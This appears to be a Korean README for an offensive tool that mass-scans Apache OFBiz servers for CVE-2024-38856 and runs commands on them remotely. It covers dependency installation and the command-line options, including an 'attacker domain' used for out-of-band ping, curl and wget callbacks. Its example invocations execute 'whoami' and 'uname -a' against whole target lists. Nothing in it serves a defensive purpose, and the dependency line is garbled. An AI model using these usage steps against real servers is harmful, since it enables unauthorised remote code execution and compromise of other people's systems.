
대규모 Apache OFBiz 제로데이 스캐너 및 RCE 수행
이 스크립트는 Apache Ofbiz 애플리케이션에서 원격 코드 실행을 허용할 수 있는 CVE-2024-38856 취약점을 스캔하도록 설계되었습니다. 악성 페이로드를 사용하여 Ofbiz 애플리케이션 내 특정 경로에 HTTP POST 요청을 보내 취약점을 악용합니다.

coloredlogs를 사용합니다.requestscoloredlogscoloramaargparseurllib3pip를 사용하여 필요한 종속성을 설치할 수 있습니다:
pip install requests coloredlogs colorama argparse urllib3
스크립트를 실행하려면 다음 명령을 사용하십시오:
python script_name.py [options]
-t, --threads: 사용할 스레드 수 (기본값: 1)-p, --port: 대상 포트-c, --command: 실행할 명령-s, --scan: ping, curl, wget을 사용한 스캔 수행-d, --domain: ping, curl, wget으로 스캔할 도메인 (공격자 도메인)-f, --file: http(s)://target,port 형식의 대상 목록이 포함된 파일명령으로 대상 스캔:
python script_name.py -f targets.txt -c "whoami"
python script_name.py -s -d example.com -p 80
python script_name.py -f targets.txt -c "uname -a"